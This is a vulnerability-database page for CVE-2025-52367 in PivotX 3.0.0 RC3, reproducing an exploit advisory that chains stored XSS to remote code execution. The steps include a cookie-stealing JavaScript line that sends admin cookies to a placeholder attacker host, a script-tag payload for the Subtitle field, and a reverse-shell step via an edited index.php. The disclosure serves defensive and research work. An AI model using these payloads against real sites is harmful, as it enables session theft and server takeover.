Vulners
Lucene search
PivotX 3.0.0 RC3 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2025-52367 | 17 Jul 202521:02 | – | circl |
 | PivotX 3.0.0 RC3 安全漏洞 | 16 Jul 202500:00 | – | cnnvd |
 | CVE-2025-52367 | 22 Sep 202500:00 | – | cve |
 | CVE-2025-52367 | 22 Sep 202500:00 | – | cvelist |
 | EUVD-2025-30753 | 22 Sep 202500:00 | – | euvd |
 | PivotX Remote Code Execution | 13 Aug 202518:54 | – | metasploit |
 | CVE-2025-52367 | 22 Sep 202519:15 | – | nvd |
 | CVE-2025-52367 | 22 Sep 202519:15 | – | osv |
 | 📄 PivotX 3.0.0 RC3 Remote Code Execution / Cross Site Scripting | 16 Jul 202500:00 | – | packetstorm |
| 📄 PivotX 3.0.0 RC 3 Remote Code Execution | 13 Aug 202500:00 | – | packetstorm |
10
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367
## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
Note: If you are already admin, skip steps 1-7
## Exploitation Steps:
1. Login as an authenticated user (normal user, no need for admin).
2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
3. Create locally a JavaScript file contaning cookie stealing code.
For example: lol.js
Containing:
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
<script src="http://LOCAL_IP/lol.js"></script>
5. Publish the page.
6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.
7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.15.4
EPSS0.7027
SSVC